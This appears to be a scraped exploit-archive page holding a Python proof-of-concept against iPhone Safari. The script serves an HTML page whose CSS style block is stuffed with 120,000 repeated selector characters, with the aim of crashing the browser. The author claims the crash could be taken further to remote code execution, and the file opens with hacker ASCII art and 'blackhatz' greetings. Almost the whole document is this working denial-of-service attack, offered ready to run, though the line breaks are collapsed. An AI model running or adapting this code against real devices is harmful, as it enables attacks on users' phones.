扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 |
#!/usr/bin/python # , #dM #MMr # 4MMML. # MMMMM.xf # ."M6MMM .MM- #Mh..+MM5MMM.MMMM #.MMM. .MMMMML.MMMMMh # )MMMh.MM5MMM MMMMMMM #3MMMMx. 'MMM3MMfxnMMMMMM" #'*MMMMMMMMMMM. nMMMMMMP" #*MMMMMx"MMM5M\.MMMMMMM= # *MMMMMh "MMMMM" JMMMMMMP # MMMMMM GMMMM.dMMMMMM. #MMMMMM"MMMM.MMMMM(.nnMP" # ..*MMMMxMMM"dMMMM".nnMMMMM* #"MMn... 'MMMMr 'MM MMM" .nMMMMMMM*" # "4MMMMnn.. *MMMMMMMP".dMMMMMMM"" # ^MMMMMMMMx.*ML "M .M*.MMMMMM**" #*PMMMMMMhn. *x > M.MMMM**"" # ""**MMMMhx/.h/ .=*" #.3P"%.... # [t12]nP" "*MMnx # SMOKE WEED #greetz to my blackhatz and baycatz #iPhone CSS::Selector crash #this Python script acts as a web server and sends a malformed long string to the CSS <style> tag #this is a remote crash bug, hoever an analysis of the debug dump shows remote code execution capability, I am just lazy import sys, socket; def main(): junk = "*>" * 120000; html = """ <html> <head> <style type="text/css"> """; html += junk; html += """ body {background: blue;} </style> </head> </html> """; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.bind(('',2121)); s.listen(1); while True: channel, details = s.accept(); print channel.recv(1024); channel.send(html); channel.close(); main(); |
体验盒子
